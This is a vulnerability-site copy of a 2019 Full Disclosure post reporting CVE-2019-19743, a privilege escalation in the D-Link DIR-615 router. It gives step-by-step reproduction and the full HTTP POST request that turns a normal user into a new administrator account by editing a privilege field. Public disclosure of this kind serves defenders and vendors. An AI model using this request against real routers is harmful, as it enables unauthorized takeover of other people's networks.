Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

D-Link DIR-615 — Vertical Prviliege Escalation

Related Vulnerabilities: CVE-2019-19743  
Source 
                							

                <!--X-Body-Begin-->
<!--X-User-Header-->
<a href="/fulldisclosure/"><img src="/images/fulldisclosure-logo.png" class="l-logo right" alt="fulldisclosure logo" width="80"></a>
<h2 class="m-list"><a href="/fulldisclosure/">Full Disclosure</a>
mailing list archives</h2>
<!--X-User-Header-End-->
<!--X-TopPNI-->
<div class="nav-bar">
<div class="nav-link">
<a href="34"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="date.html#35">By Date</a>
<a href="36"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<div class="nav-link">
<a href="34"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="index.html#35">By Thread</a>
<a href="36"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<form class="nst-search center" action="/search/fulldisclosure">
<input class="nst-search-q" name="q" type="search" placeholder="List Archive Search">
<button class="nst-search-button" title="Search">
<img style="width:100%;aspect-ratio:1/1;" alt="" aria-hidden="true" src="/shared/images/nst-icons.svg#search">
</button>
</form>

</div>

<!--X-TopPNI-End-->
<!--X-MsgBody-->
<!--X-Subject-Header-Begin-->
<h1 class="m-title">D-Link DIR-615 — Vertical Prviliege Escalation</h1>
<hr>
<!--X-Subject-Header-End-->
<!--X-Head-of-Message-->


<em>From</em>: Sanyam Chawla &lt;infosecsanyam () gmail com&gt;


<em>Date</em>: Mon, 16 Dec 2019 20:37:39 +0530


<!--X-Head-of-Message-End-->
<!--X-Head-Body-Sep-Begin-->
<hr>
<!--X-Head-Body-Sep-End-->
<!--X-Body-of-Message-->
<pre style="margin: 0em;">######################################################################################

# Exploit Title: D-Link DIR-615 — Vertical Prviliege Escalation

# Date: 10.12.2019

# Exploit Author: Sanyam Chawla

# Vendor Homepage: <a rel="nofollow" href="http://www.dlink.co.in">http://www.dlink.co.in</a>

# Category: Hardware (Wi-fi Router)

# Hardware Link: <a rel="nofollow" href="http://www.dlink.co.in/products/?pid=678">http://www.dlink.co.in/products/?pid=678</a>

# Hardware Version: T1

# Firmware Version: 20.07

# Tested on: Windows 10 and Kali linux

# CVE: CVE-2019–19743

#######################################################################################



Reproduction Steps:

   1. Login to your wi-fi router gateway with normal user credentials [i.e:
   <a rel="nofollow" href="http://192.168.0.1">http://192.168.0.1</a>]
   2. Go to the Maintenance page and click on Admin on the left panel.
   3. There is an option to create a user and by default, it shows only
   user accounts.
   
&lt;<a rel="nofollow" href="https://1.bp.blogspot.com/-f-MOwxhgrRI/XfUZSszN8TI/AAAAAAAAFb8/v2193GabEVYOO_Ax89FPrBymNTxXc32_wCLcBGAsYHQ/s1600/1.PNG">https://1.bp.blogspot.com/-f-MOwxhgrRI/XfUZSszN8TI/AAAAAAAAFb8/v2193GabEVYOO_Ax89FPrBymNTxXc32_wCLcBGAsYHQ/s1600/1.PNG</a>&gt;
   4. Create an account with a name(i.e ptguy) and change the privileges
   from user to root(admin) by changing privileges id (1 to 2) with burp suite.


Privilege Escalation Post Request

POST /form2userconfig.cgi HTTP/1.1

Host: 192.168.0.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0)
Gecko/20100101 Firefox/71.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 122

Origin: <a rel="nofollow" href="http://192.168.0.1">http://192.168.0.1</a>

Connection: close

Referer: <a rel="nofollow" href="http://192.168.0.1/userconfig.htm">http://192.168.0.1/userconfig.htm</a>

Cookie: SessionID=

Upgrade-Insecure-Requests: 1

username=ptguy&amp;*privilege=2*&amp;newpass=pentesting&amp;confpass=pentesting&amp;adduser=Add&amp;hiddenpass=&amp;submit.htm%3Fuserconfig.htm=Send

       5. Now log in with newly created root (ptguy) user. You have all
administrator rights.


Please let me know if any other information required from my side for this
vulnerability.


Best Regards,

Sanyam Chawla

_______________________________________________
Sent through the Full Disclosure mailing list
<a rel="nofollow" href="https://nmap.org/mailman/listinfo/fulldisclosure">https://nmap.org/mailman/listinfo/fulldisclosure</a>
Web Archives &amp; RSS: <a rel="nofollow" href="http://seclists.org/fulldisclosure/">http://seclists.org/fulldisclosure/</a></pre>
<!--X-Body-of-Message-End-->
<!--X-MsgBody-End-->
<!--X-Follow-Ups-->
<hr>
<!--X-Follow-Ups-End-->
<!--X-References-->
<!--X-References-End-->
<!--X-BotPNI-->
<div class="nav-bar">
<div class="nav-link">
<a href="34"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="date.html#35">By Date</a>
<a href="36"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<div class="nav-link">
<a href="34"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="index.html#35">By Thread</a>
<a href="36"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
</div>
<h3 class="m-thread">Current thread:</h3>
<ul class="thread">
<li><strong>D-Link DIR-615 — Vertical Prviliege Escalation</strong> <em>Sanyam Chawla (Dec 17)</em>
</li></ul>


<!--X-BotPNI-End-->
<!--X-User-Footer-->
<!--X-User-Footer-End-->
<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started